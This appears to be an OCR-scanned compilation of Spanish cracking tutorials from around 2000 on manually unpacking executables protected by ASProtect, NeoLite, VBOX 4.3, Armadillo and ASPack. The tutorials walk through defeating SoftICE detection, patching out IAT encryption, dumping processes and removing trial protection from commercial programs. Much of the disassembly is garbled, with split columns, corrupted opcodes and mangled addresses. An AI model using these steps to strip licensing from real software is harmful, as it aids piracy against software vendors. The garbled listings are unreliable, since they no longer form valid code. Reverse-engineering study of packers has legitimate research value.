015F:0055672A  8B15F4665500 MOV EDX, [005566F'4] <-- y se pone en EDX 
015F:00556730 C702FFFFFFEFF MOV DWORD PTR [EDX],FFFFFFFF <-- para poner FF... 
en la estructura 
015F:00556736 43 INC EBX <-- se hace que EBX 
apunte a la DLL 
015F:00556737 53 PUSH EBX <-- se pone en la pila 
015F:00556738 FF35F8665500 PUSH DWORD PTR [005566F8] <-- así como su destino 
(dirección actual 
de la IT) 
015F:0055673E E8B90BA2BF CALL KERNEL32!1strcpy <-- se copia 


015F': 


015F': 
015F': 


015F': 


015F': 


015F': 


015F': 


015F': 


015F': 


015F': 


015F': 


015F': 
015F': 


015F': 


015F': 


015F': 


015F': 
015F': 


015F': 


015F': 


015F': 
015F': 
015F': 
015F': 


015F': 
015F': 


015F': 
015F': 


015F': 
015F': 
015F': 


015F': 
015F': 
015F': 
015F': 


015F': 
015F': 


015F': 


00556743 FF35F8665500 
00556749 E85F0OCA2BF 
0055674E 40 

0055674F  8B15F8665500 
00556755 81EA00004000 
0055675B  8305F466550004 
00556762 8B0DF4665500 
00556768 8911 
0055676A 8B59F4 
0055676D 895904 
00556770 8305F466550008 
00556777 0105F8665500 
0055677D 61 

0055677E  833D6BFC740000 
00556785 “743C 
00556787 8B15F8665500 
0055678D 81EA00004000 
00556793 8917 
00556795 686BFC7400 
0055679A 8B15F8665500 
005567A0  83C202 
005567A3 52 

005567A4 E8530BA2BF 
005567A9 52 

005567AA E8FEOBA2ZBE 
005567AF 0503000000 
005567B4 0105F8665500 
005567BA 61 

005567BB  83C704 
005567BE E9CFEBFEFFE 
005567C3  3D00000040 
005567C8  “7D22 
005567CA 83F900 
005567CD 751D 
005567CF  FF7001 
005567D2 E8B5DE8FFEFE 
005567D7  8B15F8665500 
005567DD 81EA00004000 


EDX, [005566F 


E 


DX, 


ECX, [005566F 


[ECX] ,EDX 


EBX, [ECX-0C] 


BX 


— 


ECX+04],1 


|] 


DWORD PTR [005566F4],08 


[005566F8],] 


|] 


DWORD PTR [0074FC6B],00 


005567C3 


5] 


DX, [005566F 


DX, 00400000 
EDI],EDX 


— EH 


0074FC6B 


5] 


DX, [005566F 


DX, 02 
DX 


Ra 


DX 


EAX,00000003 


|] 


[005566F8],] 


EDI, 04 
00555392 
EAX, 40000000 


005567EC 
ECX,00 
005567EC 


0055508C 
EDX, [005566F 


EDX, 00400000 


KERNEL32!1strlen 


8] 


DWORD PTR [005566F4],04 


4] 


AX 


8] 


8] 


ERNEL32!1strcpy 


KERNEL32!1strlen 


AX 


DWORD PTR [EAX+01] 


8] 


DWORD PTR [005566F8] <--= se Calcula la 


longitud del nombre 
<-- de la DLL 
<-- se incrementa para 
el 0 de final 
<-- se pone la dirección 
actual de la IT (contiene 
el nombre de la DLL) 


<-- se resta el valor de la 
image base 
<-- se actualiza 
el TAD 
<-- y se pone su dirección en 


ECX 
<-- para poner el puntero 
hacia el nombre de la DLL 


<-- se recupera el 
OriginalFirstThunk 
<-- que se pone en el 
FirstThunk 
<-- se actualiza 
el IAD 
<-- así como la IT 
<-- se ha terminado con el 
IAD y se continúa 
<-- se tiene un 
nombre de función 
<-- si es no, va hacia 
encriptado/ordinal 
<-- si es si, se recupera la 
dirección actual de la IT 
<-- se resta la image base 
<-- y se pone un vínculo en 
la IAT 
<-- se pone la dirección del 
nombre de función 
<-- se pone la dirección 
actual de la IT 
<-- se añade 2 para el ordinal 
<-- se pone en la pila 
<-- y se copia la procname 
<-- se pone el nombre de la 
función 
<-- se Calcula su longitud 
<-- se añade 3 para el cero 
de final y el ordinal 
<-- se actualiza la IT 
<-- se recuperan los 
registros 
<-- se pasa al siguiente 
<-- se efectúa el bucle 
<-- EAX contiene la 
dirección de una API 
<--= si, ordinal 
<-- ECX= 0 
<-= si, ordinal 
<-- se pasa el parámetro 
para la función 
<-- de desencriptado 
<-- se pone la dirección 


actual de la IT en EDX 
<-- se resta la image base 


015F:005567E3 8917 MOV [EDI] ,EDX <-- se pone el vínculo en 
la IAT 
015F:005567E5  6864FC7400 PUSH 0074FC64 <-- se pone la dirección del 
nombre de la función 
015F:005567EA EBAE JMP 0055679A <-- vuelve a ponerse en la IT 
015F:005567EC  83EE04 SUB ESI,04 <-- se recupera el ordinal 
015F:005567EF 8B16 MOV EDX, [EST] <-- en EDX 
015F:005567F1 81C200000080 ADD EDX, 80000000 <-- se prepara el ordinal 
para Windows 
015F:005667F7 8917 MOV [EDI],EDX <-- se pone en la IAT 
015F:005667F9 61 POPAD <-- se recuperan los 
registros 
015F:005567F2  83C704 ADD EDI, 04 <-- se pasa al siguiente 
015F:005567F5  E998EBFFFE JMP 00555392 <-- efectúa el bucle 
015F:005567FA 0000 ADD [EAX],AL 
015F:005567FC 0000 ADD [EAX] ,AL 


Creo haberlo comentado exhaustivamente, pero de todas maneras es duro de explicar. Antes de ejecutar el bucle deberá ponerse en 5566K4 el 
inicio del lugar donde se quiere poner el IAD (yo he puesto 4B8950, porque cuando instala la falsa tabla de importación pone vínculos hasta 
aquí, ya que la IAT se llegará hasta aquí). A continuación, en 5566F8 se pone el sitio donde se quiere poner la IT (yo he puesto 5566FC 
pensando que 200h bytes para el TAD era suficiente. Hay que poner igualmente los tres NOPs en el call de desencriptado (ver capítulos 
anteriores), pero para descubrirlo hay que extender la búsqueda: s 0 1 f£ffffff 55 8b ec 81 c4 £8 fe ff ff 53 56 8b 5d 08 8b 03 89 45 £S Sd. 


Ahora se deja tranquilamente que se ejecute el bucle y que el rebuilder nos reconstruya la import table. Se deberá tener en cuenta el poner un 
breakpoint a la salida del bucle al nivel del POPAD. Ahora se vuelca todo esto: pagein d 4b8000 3000 c:dimport.dat. Deberá tenerse 
cuidado de efectuar primero el volcado del programa y luego unir nuestra nueva tabla de importaciones al volcado (como se ha visto 
anteriormente). 

Aquí no tenemos una virtual address igual al raw offset, por lo que hay que buscar en el programa. Una vez hecho esto queda aún el cambiar 
el EIP (BF27C) y la import table RVA (B8950) que corresponde al inicio del import descriptor. 


Ahora se ejecuta el programa y... un bonito mensaje de error: Asprotect API not found! Running in unregistered mode. Je je, el 
mismo problema que en AMV , una parte del programa está encriptado con una clave. Bien, para evitar esta pantalla hay que poner bpx 
messageboxa y se fuerza el salto que la precede. 

Ahora ya no queda más que crackear el programa. Tenemos un volcado con una verdadera tabla de importaciones. Confieso que este import 
rebuilder no está especialmente optimizado, pero bueno... Además he intentado explicar su principio pero esto no es demasiado sencillo... 


VI_Conclusión 


Y bien, este ensayo sobre el desempaquetado manual de Asprotect 1.0+ ha terminado. He presentado distintas maneras de proceder, pero en 
mi opinión, el import rebuilder final es el más interesante porque reconstruye una verdadera tabla de importaciones. 
Aquí tenéis unas cuantas lecturas suplementarias si tenéis valor para ello O: 


http: //assembly.citeweb.net/zip/IAT.htm Texto muy interesante sobre el añadido de una DLL a la 
IAT 

http://christal.citeweb.net/tutor/cdilla.htm Estudio de Cdilla para comprender mejor el call fixer 

http: //tamambolo.free.fr Estudio de Cdilla para comprender mejor el call fixer 


http: //www.woodmann.com/tsehp asprotect105.htm El texto de Tsehp sobre el volcado de Asprotect 


(última versión) 
http: //tsehp.cjb.net/ Para los textos sobre Asprotect y Cdilla 


ttp://assembly.citeweb.net Para los textos sobre el parcheado de Asprotect ... 


Debo dar las gracias a muchas personas: Christal por haberme relanzado en esta protección, TeeJi por haber aceptado estudiar esta protección 
y por las discusiones sobre ello en IRC, y +Tsehp por haber dedicado su tiempo para responderme y sobre todo por haber encontrado y 
puesto a punto (con un muy buen tutorial) un primer método de volcado que me ha permitido finalmente llevar a buen fin el import table 
rebuilder. 

Un saludo especial a Alexey Solodovnikov, quien seguramente nos prepara una buena sorpresa para el futuro... 


Amistosamente, 


LuTiN NoIR 


(c) 2000 . LuTiN NoIR - city_of bitch caramail.com 


Tutorial número 32 
Escrito por Etenal Bliss 
Correo electrónico: Eternal_BlissChotmail.com 
Sitio Web: http://crackmes.cjb.net 
http://surf.to/crackmes 
Escrito el: 26 de febrero 2000 


Detalles del programa: 
Nombre: Notepad.exe empacado con NeoLite v2.0 


Herramientas usadas: 
ProcDump 

Softice 

Symbol Loader 


Método de crackeo: 
Desempacado 


Método de visualización: 
Usa Notepad con "Word wrap" activado 
El área de la pantalla a 800 X 600 pixeles (Optional) 


Acerca de este sistema de protección 


Notepad.exe empacado con NeoLite v2.0 (opción: compresión máxima) 
Objetivo: Desempacándolo manualmente 


Acerca de este tutorial 


Este tutorial te enseñará como desempacar programas empacados usando NeoLite v2.0. 

El programa objeto de estudio es notepad.exe que está disponible en la mayoría de ordenadores. 

Como todavía no soy muy bueno explicando ciertas cosas de desempacado, sólo puedo intentar mostrarte de la mejor 

forma el método simple. La Tabla de importación y demás no la veremos aquí. Este método de desempacado te dejará ejecutar 
el programa y parchearlo. 

Para el método avanzado, deberás leer otros tutoriales. 


Haciendo que Softice rompa en el Punto de Entrada 
Abre el notepad.exe empacado con el Symbol Loader. 


Haz clic en el segundo icono del Symbol loader que dice 
"Load the currently open module" 


Obtendrás un mensaje de error y te preguntará si quieres cargar el ejecutable de cualquier manera. Haz clic en "Yes". 


Si Softice está cargado, entonces debería romper en el punto de entrada del programa. 
Pero no rompe y el notepad.exe empacado se ejecuta normalmente. 


Es hora de cambiar las características de las secciones... 
Cambiando las características, obligarás a Softice a romper en el punto de entrada. 


Carga el notepad.exe empacado usando ProcDump (usando el PE editor) 
Verás una ventana con "PE Structure Editor" como título. 
Haz Clic en el botón que dice "Sections" 


Obtendrás otra ventana con "Sections Editor” como titulo. 
Verás las diversas secciones del notepad.exe empacado. 


La primera sección es .text y sus características es COOOO0O80. 
Cambia las características haciendo clic sobre .text con el botón izquierdo del ratón 
y elige "edit section" con el derecho. 


Obtendrás otra ventana con "Modify section value" como título. 

Cambia las Características de Sección de CO0O008S0 a E0000020. 

Sigue pulsando ok hasta que regreses a la ventana principal del ProcDump. 
Puedes dejar el ProcDump solo por el momento. 


**Por mucho que me gustaría explicar por qué es necesario hacer esto, no puedo. 8P 
Podrías leer más sobre estructuras PE para encontrar el porqué. 
Por lo que me han dicho, E0000020 hará la sección ejecutable para que 
Softice rompa en el punto de entrada. 


Encontrando el Punto de Entrada y volcando el programa 


Ahora, espero que no hayas cerrado el symbol loader. Si lo hiciste, entonces vuelve a abrir el notepad.exe 
empacado y carga el ejecutable otra vez. 


Cuando hagas clic en "Yes" esta vez, te encontrarás en Softice... 


He empastado los siguientes códigos y he hecho comentarios sobre ellos. 


IO Y 0) que ves en SICE 


**Estarás aquí cuando Softice rompa. Vete pulsando F10 para tracear a través de los códigos. 


0040D17E E9A6000000 JMP  — 0040D229 (JUMP) 
0040D229 8B442404 MOV — EAX,[ESP+04] 

0040D22D 23058FD14000 AND — EAX,[0040D18F] 
0040D233 E871030000 CALL 0040D5A9 


** el desempacado del programa en la memoria es hecho por el CALL de arriba 
Puedes tracear dentro de él y ver lo que hace si quieres. 8) 


0040D238 FE0528D24000 INC” BYTE PTR [0040D228] 
0040D23E FFEO JMP.”— EAX 


**Este "JMP EAX" llevará el programa al Punto del entrada original 
Toma nota de EAX que es 004010CC en este caso. 
Ahora, escribe lo siguiente en 0040D23E: 


a elp (y dale a enter) 
Jmp eip (y dale a enter) 
FS 


Esto cambiará los códigos en 0040D23E. Advertirás que después de escribir "jmp eip" y presionar Enter, 

la intrucción en 0040D23E es ahora un JMP. 

Esto hará eficazmente que el programa haga una pausa. Presionar FS te permite regresara windows y volcar 
el programa desempacado al DISCO DURO. 


Usando ProcDump, haz clic derecho en la primera lista y elige "Refresh list". 
Busca el notepad.exe empacado y haz clic derecho en él. 

Escoje "Dump (Full)" y guardalo. 

Haz clic derecho otra vez y escoje "Kill Task".( terminar proceso) 


Cambiando el Punto de Entrada 


Si recuerdas, el punto de entrada del notepad.exe desempacado es 004010CC. 
Usando la función del PE editor del ProcDump otra vez, abre el notepad.exe desempacado. 


Bajo "Header Infos" (información de la cabecera), verás que el punto de entrada es 004010CC que es el punto correcto 
de entrada, así que ningún cambio es requerido. 


Ahora, pon a funcionar el notepad.exe desempacado. 
Debería marchar. 8) 


notas finales 
Este tutorial está dedicado a todos los novatos como yo. 
Mis gracias y mis gratitudes para:- 
MiZ de quien aprendí lo básico de desempacado. 
Todos los escritores de tutoriales de Cracks y CrackMes 


y también para todos los crackers que han estado soportando mi sitio y el proyecto de foro. 


Traducido por !!!JNP 


Como remover manualmente 


una protección VBOX 4.3. 


Publicado por +Tsehp, 26 de marzo, 
2000. 
Traducido por “*[G]JoLe[E]”?, 25 de 
Enero, 2001 


*Nota de Tsehp : Este Ensayo trabaja sobre el constructor VBOX 
version 4.3. 
Realmente no trabaja en versiones anteriores, como netfusion 5 
por ejemplo. 


Un tutorial escrito por dEZZY / Beber o Morir 


General 

Este documento está escrito como una guia para remover 
manualmente una 

protección vbox 4.3. Este es un protector comercial muy 
diftresl 

que envolverá un programa desprotegido en un sistema donde 
puede ser distribuido en Internet como un software de prueba. 
ias, 

sobre VBOX puede ser encontrada en 

http: //www.previewsystems.com. 


Herramientas usadas 


* SoÉftICcE 4.01 (o TRW2000: vil. 13) 


* SoftICE Backdoor Keeper 

* Procdump 1.6.2 FINAL de G-RoM (hola compañero!) 
Todas las herramientas pueden ser descargadas de 
httep://protools. cb. net 


Comenzando 

Si tienes parchado SoftICE con icepatch o sice backdoor 
keeper, salta a la siguiente sección. Si no, tienes que vencer 
la rutina de detección de sice manualmente. 


Nota: También puedes evitar esta molesta detección usando 
TRW2000 con Faults=0ff. 


Evitando la detección del SoftICE 

Carga el programa usando Sice o trw con la opción "faults = 
on" fijada. 

El programa Caerá en una parte del código que se ve así: 


MOV ECX,ESP 

MOV EAX,ECX  <-- Cae Aquí 

POP EDI 

POP HSl 

POP EBP 

RET 

Y el debugger te da el siguiente mensaje: 
"Break Due on Fault 03" 


Rastrea al RET y saldrás a la rutina que se ve así: 


070049D9 8B45F8 MOV EAX, [EBP-08] 

070049DC 8B4024 MOV EAX, [EAX+24] 

070049DF 8945FC MOV [EBP-04],EAX <a BME- «aqui 
070049E2 68EA490007 PUSH DWORD 070049EA 

070049E7 FF65DFC JMP NEAR [EBP-04] 

070049EA 33C0 XOR EAX,EAX <-- Ordenamos aquí 
070049EC 5F POB: <E DI 

070049ED 5E POP EST 

070049EE 5B POP EBX 

070049EF C9 LEAVE, 


070049F0 C3 RET 


Ahora, fija un bpm para la ejecución en 070049DF (bpm 
cs:070049DF x) y reinicia el programa. Una vez que llegué 
allí, mueve 0 a EAX (r eax 0) 

Y continua leyendo el tutorial presionando PF). 


Nota: Si no puede encontrar la rutina mencionada arriba, fija 
un bpx en 

Kernel32!RaiseException, una vez aparezca sice, depura el 
siguiente 

CALL [alguna dirección], y luego dentro del siguiente CALL, y 
dentro de un 

INT 2E y sigue depurando hasta que alcances el IRETD, F8 para 
ir dentro y 

Aparecerás en un RET justo despues del INT 2E. Ahora mantente 
depurando hasta que salgas a un CALL VirtualFree. Bien, mira 
50 o 60 líneas abajo en la ventana de código y verás la 

Ut ina: 


Omitindo la Encriptación IAT (Nueva desde VBOX v4.2) 

"El código principal de VBOX v4.3 es muy parecido a la vieja 
versión 4.2. 

La única diferencia es que ahora VBOX encripta el IAT mientras 
carga el programa . Y redirige las direcciones de las 
funciones importadas a la rutina en VBOXT430.DLL que las 
desencripta. De esta forma el programa depende de 
VBOXT430.DLL para trabajar y un volcado normal resulta'ra en 
un IAT inservible. Así que también lo crackearemos." 


Antes de que presiones el botón Try, ingresa a SICE y fija un 
'"bpx GetProcAddress'. Cuando SICE aparece dentro de 
GetProcAddress, 

has un 'p ret' para salir. Ahora deberías estar viendo el 
siguiente código: 


ULSFS0TO0BB6 : PUSH DWORD PTR [EBP- 
20] 

OL5FS0O7OOBBI9 CALL 
[KERNEL32!GetProcAddress] 


015F:0700BB3F MOV EDI,EAX <= Estas aquí 
015F:0700BB41  CMP 

EDI, EBX 

015F:0700BB43  JZ 

0700BCE6 

015F:0700BB49 MOV 

¡HSA is ME A 

015F:0700BB4C ADD 

ESI, [EBP+08] 

015F:0700BB4F CMP [EBP-24] ,EBX <-= llama a la 
función de encriptación? 

015F:0700BB52  JZ 0700BB89 <= salta. SL. 10 
015F:0700BB54 LEA EAX, [EBP-0114] 

UL5F+O7OOBBSA: PUSH EAX 

OLSFUTOOGBBOB: PUSO DWORD PTR [EBP-20] 
OLSFSO7OU0BBIE- PUSH EDI 

015F:0700BB5F CALL 0700BF61 

015F:0700BB64 ADD ESP 06 

OTSESUT7O0OBBOY TEST EAX, EAX 

015F:0700BB69 JZ 0700BB89 

LS: 0P400BB6B:. PUSH DWORD PTR [EBP+28] 
ULSFS<UTOOBBOE PUSH EDI 

OLSESOT7O00OBBOF" PUSH DWORD PTR [EBP+24] 
OL5FSO7OOBBIZ PUSH DWORD PTR [EBP+20] 
015F:0700BB75 CALL O700BDFE 

015F:0700BBY/A ADD ESP, 10 

015F:0700BB7D CMP EAX, EBX 

015F:0700BB7F  JZ 0700BDD6 

015F:0700BB85 MOV [ESI],EAX GA 
eax=encriptado 

015F:0700BB87 JMP 0700BB8B 

015F:0700BB89 MOV [ESTI EDI <-- eax=no 
encriptado 

015F:0700BB8B INC DWORD PTR [EBP-28] 
015F:0700BB8E MOV AX [EBR= 

28] 

ULSE:>0700BB9L EMP EAX, [EBP- 

4C] 

015F:0700BB94 JL 


0700B9E3 


Este código trabaja como un cargador OS. Después de obtener 
las direcciones de las funciones, algunas de estas están 
encriptadas antes de almacenarse en la IAT. Lo que debemos 
hacer aquí es parchear la rutina para saltar la encripción de 
todas las direcciones. Esto se hace Cambiando la instrucción 
JZ en 700BB52 por un JMP 0700BB809. 


Preparandote para el Volcado 


Ahora puedes hacer muchas veces el 'p ret' hasta que regreses 
de un 'call edi'. 

Fija un bmp en ejecución en él y sal de SICE. Cuando llegue 
de nuevo, Camina en esa llamada a función. "Notarás que el 
código cambia mientras rastreas dentro de él. Eso está bien. 
Camina en la primer llamada a función aquí. Ahora busca un 
'call eax' con EAX apuntando a GetProcAddress 

Casi 50-70 líneas abajo. Rastreala. Luego camina en ella y 
dentro en la siguiente llamada a función. Aquí verás el 
siguiente código cerca de 30 líneas abajo: 


015F:011604E0 MOV EDX, [EBP-08] 

015F:011604E3 MOV EAX, [EDX+14] <-- obtiene el Punto 
de Entrada de la aplicación 

015F:011604E6 MOV [EBP-10], ,EAX 

015F:011604E9 MOV EBX, [EBP-10] <-- El EP va a EBX 
015F:011604EC JMP EBX <-- Salta al Punto de 


Entrada Real 


Rastrea hasta que alcances JMP EBX. Ahora ensambla y escribe 
-OMP ELE" 
(a eip; jmp elp) así que se verá así: 


015F:011604EC JMP 011604EC <-- bloqueado, salta a 
sí mismo 


(En caso no puedas ensamblar, los bytes para JMP ElP son: EB 
FE) 


Así, cuando salgas de SICE, el proceso se blogueará en esta 
instrucción, 
Presiona F5 para seguir. 


Inicia procdump.exe, ve a estas opciones. En 'structure', 


selecciona todo. En imports, selecciona 'rebuild new import 
table'. Selecciona el proceso en Procdump con el botón derecho 
del mouse, 

y has un volcado (completo). Dale un nombre (dump.exe). 
Ahora, clic en 

"PE Editor" y selecciona el archivo dump.exe. En la caja 
"Entry 


Point" deberías ingresar el Punto de Entrada correcto. 
Recuerda que esto es 
el valor de EBX en la última instrucción (JUMP EBX) - 
ImageBase. 

PE Punto de Entrada = EBX - ImageBase (00400000) 
Así, por ejemplo, si EBX era 450983, el punto de entrada que 
tienes que ingresar 
en el encabezado PE de tu archivo dump.exe es: 

450983-400000 = 50983 

Presiona Ok para grabar los cambios. 


Ahora tienes un exe funcionando sin la protección vbox en tu 
DISCO Duro: 
Felicitaciones. 


Ahora qué? 

Opcionalmente puedes reoptimizar el encabezado PE con MakePE o 
algo. Y para terminar puedes empacarlo con BPECompact oO 

algún otro empacador de ejecutables. 


Addendum: Ultrarápido crackeo de Vbox 4.3 usando TRW2000 
Herramientas necesarias: solo la versión registrada de 
TRW2000 v1.11+ 
Tiempo estimado: 30 secs 


1) ejecuta TRW2000 y presiona OK para dejarlo residiendo en 
memoria 

2) Ctrl+M para ir en TRW2000 y fija: Faults off 

3) ejecuta el programa Vboxeado hasta que vaya a la pantalla 


IE 

4) Ctrl1+M y fija: bpx kernel32!getprocaddress 

5) presiona el botón "Try" 

6) en TRW2000, presiona F12 y F10 para salir del CALL 


015F:0700BB39 CALL 
[KERNEL32!GetProcAddress] 


015F:0700BB3F MOV EDI,EAX <>. estás aqui 
015F:0700BB41  CMP 

EDI, EBX 

015F:0700BB43 JZ 

0700BCE6 


015F:0700BB49 MOV 
Bo Ey [BSI+T6] 
015F:0700BB4C ADD 
ESI, [EBP+08] 


015F:0700BB4F CMP [EBP-24] ,EBX <-= llamada a la 
función de encriptación? 
UL5F:+0700BB52  J2 0700BB89 <-= salta si no 


7) en TRW escribe: a cs:700bb52 (la dirección del Segundo JZ) 

y escribe en él: jmp short 0700bb89 

8) ahora ingresa: bl 

eso te mostrará los breakpoints actuales (solo 1 en 
GetProcAddress) 

algo como esto: bpx 015F:BFF79834 

ahora escribe: bpe 1 (para editarlo) 

haslo verse así: bpx 015F:BFF79834 if (eax==BFF79834) 

(nota que la dirección en eax es la misma que la dirección de 
GetProcAddress') 

9) presiona F5 para continuar. Cada vez que TRW aparezca, 
presiona F12 y luego Fl0, 

y ve que saliste de un CALL EAX. 

10) repite el paso 9 (6 o 7 veces) hasta que veas código como 
este: 


CALL EAX 

TEST EAX,EAX <-- estás aquí 
MOV [EBX+8C],EAX 

UNA OLITFOZSS 

POP EDI 


POP Esl 
POB: EBE 


11) Rastrea con F8 hasta el JZ y entra al siguiente Call. 
Este es el ultimo call que el programa real 


ejecuta. 30 líneas abajo, verás: 

015F:011604E0 MOV EDX, [EBP-08] 

015F:011604E3 MOV EAX, [EDX+14] <-- obtiene el punto 
de entrada del programa 

015F:011604E6 MOV [EBP-10],EAX 

015F:011604E9 MOV EBX, [EBP-10] <-- el Punto de 
Entrada a EBX 

015F:011604EC JMP EBX <-- salta al Punto de 


Entrada Original 


12) continua rastreando con F8 y has el JMP EBX. Ahora estás 
en la primer instrucción 

del programa real, escribe esto en TRW: makepe 

13) Voila! Ahora tienes un archivo llamado newpe.exe en el 
directorio default 

que es una copia desvboxeada del programa (con el Punto de 
Entrada correcto). 


EL FIN 


Armadillo el esquema de protección adicto al archivo .tmp 


basado en la version 1.73 


Primero, Armadillo tiene 3 rutinas anti-debug, las cuales no son muy inusuales. 
La primera es nuestro bien conocido truco Meltice (CreateFileA 

MASICE, NTICE y SIWDEBUG), inmediatamente seguido por un set SEH y 
llamada INT 3. La última deteccón solo trabaja en NT (llamada a la api 
IsDebuggerPresent). 


Melticetrick: 

Carga el programa en el Symbol Loader; bpx en CreateFileA; presiona f5 3 veces; 
deberías estar en el primer archivo .tmp creado aleatoriamente; Inmediatamente 
sigue un cmp y un salto condicional; cambia el salto condicional a uno incondicional; 
Luego GetLastError es llamado; con tal que el valor retornado por la api sea 
00000002 todo está bien. Camina mas all y lograrás ver 

que todo es puesto en un loop (uno para SICE,NTICE,SIWDEBUG ); 

Para el último (SIWDEBUG) el valor retornado de GetLastError será 

00000032= ERROR_SHARING_VIOLATION, cambia el valor a 00000002 y 

todo estará bien. 


IsDebuggerPresent: 

Despues del truco Meltice, verás que hay una llamada api para 
GetProcAddress. Esta api retorna la dirección de IsDebuggerPresent 

si estás trabajando bajo WinNt de lo contrario será 0. Para usuarios WinNT: 
solo cambien el salto condicional que sigue a la llamada api. Todos los demás: 
No se preocupen por eso, solo continuen. 


Int 3: 
Ahora puedes presionar F12 2 veces. Obtendrás algunas Messageboxes diciendote 
cosas aburridas...... Finalmente aterrizarás una línea debajo de un call [ebp-140]. 


A proposito, esta llamada fue la llamada al primer archivo .tmp. Camina y verás 
un Int 3 que viene. Una línea antes del int3 (mov eax,00000004) 

escribe 'a' y ensambla la línea a '¡mp 0'. Esto activará una excepción 

y el programa pensará que no hay un Debugger instalado 

que maneje la excepción. 


Si presiona FS ahora, verás el programa real, pero no lo hagas porque 
quiero explicar como es que Armadillo prepara el programa real. Primero que nada, 


crea un archivo, un archivo .tmp0, donde escribe el código real del programa. Algunos 
de ustedes pueden pensar ahora por qué no esperamos a que escriba el archivo, 

fijando Armadillo en un loop infito y que haga una copia del archivo .tmp 

y todo estaría bien. Eh!! pienso que esta es la única parte del código 

donde los programadores de Armadillo pensaron acerca de lo que hicieron. 

El hecho es, que escribieron el programa real completo en un archivo tmp, 

pero la primera sección solo contiene XXXXXX. Así que es inutil hacerlo 

de esta forma. 


Lo que hace Armadillo, es que crea ese proceso (api CreateProcess) con la 

flag suspendida activada, esto significa que solo carga el programa en memoria 

y la ejecución se detiene antes de la primer línea de código. Ahora Armadillo 

hace una llamada a WriteProcessMemory donde las XXXX's son sobreescritas con el 
código real de la primer sección. Ahora tenemos un programa completo en memoria, pero 
no lo puedes volcar porque está suspendido, asi que debe haber una llamada a 
ResumeThread para dejarlo correr. 


Esto es llamado en un loop (WaitForDebugEvent, ContinueDebugEvent). Que significa 
que depura el proceso creado. Pienso sobre por que Armadillo debería 
depurar el archivo .tmp? Respuesta: porque quiere saber cuando el usuario 
cierra y sale del programa real, así Armadillo puede hacer algo y salir. 
Entonces, como obtenemos un archivo útil sin Armadillo? 

Heh es muy fácil. Fija un bpx para ResumeThread antes del ¡mp 0. 

luego presiona f5. Softice aparecerá; f12 para regresar a Armadillo y escribe 
'a”; ¡mp eip' 

f5 luego; abre procdump, selecciona el archivo .tmp en la lista de tareas 

y haz un volcado completo. Eso es todo, nada mas que hacer. Ni siquiera 
cambiar el Punto de Entrada. No es raro? 

Heh yo diria yep. 
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Desempacado Manual 


Descomprimiendo/Desempacando Manualmente Un archivo 
Comprimido/Empacado 


por ytc_ [tNO '99] 

5 de Marzo, 1999 
Traducción de “[G]oLe[E]* 

25 de Enero, 2001 


| INTRODUCTION | 


Los objetivos empacados o comprimidos usualmente son ejecutables (*.exe) o dynamic link libraries (*.dll) cuyos opcodes han sido comprimidos o 
empacados por medio de manipulación de bytes y algoritmos para obtener archivos mas pequeños. Estos archivos, al ser desensamblados usando 
Windows Disassembler (W32Dasm) o Interactive Disassembler (IDA), darán resultados nulos o basura con algunos opcodes desensamblados. Hay 
desempacadores para ciertos empacadores en la web, pero algunas veces no trabajan porque los programadores encontraron formas de vencerlos, de 
allí la necesidad del desempacado manual. 


Antes de continuar, debo agradecerle a Iczelion por ayudarme a desempacar mi primer ejecutable. Él me explico un monton acerca de los PE y las 
tablas de importación y me dio instrucciones y pasos para desempacar un archivo. MUCHAS GRACIAS! ;-) 


OBJETIVO | 


El objetivo en el que estaba trabajando era Powerstrip v2.35.01, disponible en Entech Taiwan, empacado con ASPack, también de la misma 
compania. Pero, cualquier objetivo, media vez esté empacado con él puede ser usado, aunque la rutina de desencripción puede diferir un poco. 


| HERRAMIENTAS USADAS | 
Softice -- El *mejor* debugger que encontraras. 


Icedump -- herramienta para SoftlCE para volcar memoria. También puedes usar Softdump de Quine. 
Disassembler (opcional) -- IDA es el unico disassembler para este objetivo. W32Dasm no podría darte algo. 
Procdump -- Solo lo usaré como PE Editor. 

Hexeditor -- Obten uno que sea capaz de hacer copy y paste. Ultraedit es el que uso. 

Conocimiento del encabezado PE -- rapidamente explicare acerca de él en el camino. 


Todas las herramientas mencionadas están disponibles en el Site de lczelion o en el mio, pero los que están en el mio no están muy actualizados. 
Estaré asumiendo que sabes como usar tus herramientas y las has configurado correctamente. 


E ENSAYO | 


Como todos sabemos, los empacadores comprimen los ejecutable y dll's para obtener archivos mas pequeños en tamaño y tambien para proteger los 
objetivos de los crackers casuales. Podrás encontrar el lugar que quieres parchear en memoria (usando Softice por supuesto), pero debido a que el 
objetivo está empacado, no puedes encontrar el lugar. Ahora, hay una posibilidad acerca de los exes y dll's comprimidos -- *NO* pueden ejecutarse en su 
estado compreso. *DEBEN* estar desempacados en memoria. *PRIMERO?*, antes de saltar a las instrucciones reales. Usando este conocimiento, 
seremos capaces de trabajar a nuestro modo a traves de esto. 


No explicare como obtener la rutina principal de desempaque. Usando softice e IDA, *deberias* ser capaz de saber donde está la rutina. Si no puedes, 
entonces te sugiero primero ganar mas experiencia. Aquí está un snippet de la rutina principal. Lo copié de IDA y lo edite un poco para que se viera como 
lo que verías en SoftICE. 


005B0000 60 pusha 

005B0001 E8 00 00 00 00 Call 005B0006 ; llamando al siguiente opcode 
005B0006 5D pop ebp ; obteniendo la direccion actual 
005B0007 81 ED AE 98 43 00 sub ebp, 004398AE ; [hace algunos calculos 
005B000D B8 A8 98 43 00 mov eax, 004398A8 ; para obtener la ImageBase 


005B0012 03 C5 add eax, ebp ; del exe a eax] 


005B0014 2B 85 12 9D 43 00 sub eax, [00439D12+ebp] ; image base (00400000) 


005B0O01A 89 85 1E 9D 43 00 mov [00439D1E+ebp], eax ; guarda el image base 

005B0020 80 BD 08 9D 43 00 00 cmp byte ptr [00439D08+ebp]1, 0 ; compara el byte con O 

005B0027 75 15 3jnz 005B003E ; salta a los calls magicos si no es O 

005B0029 FE 85 08 9D 43 00 inc byte ptr [00439D08+ebp]l ; incrementa el valor en 
la localidad 

005B002F E8 1D 00 00 00 call 005B0051 ; Call Magico 1 

005B0034 E8 73 02 00 00 Call 005B02AC ; Call Magico 2 

005B0039 E8 OA 03 00 00 Call 005B0348 ; Call Magico 3 

005B003E 8B 85 0A 9D 43 00 mov eax, [00439D0A+ebpl] 

005B0044 03 85 1E 9D 43 00 add eax, [00439D1E+ebp] ¡obtiene la DirecciónDelEP real 

005B004A 89 44 24 1C mov [esp+1C], eax ; lo guarda 

005B004E 61 popa 

005B004F FF E0 jmp eax ¡; salta al Punto de Entrada real 


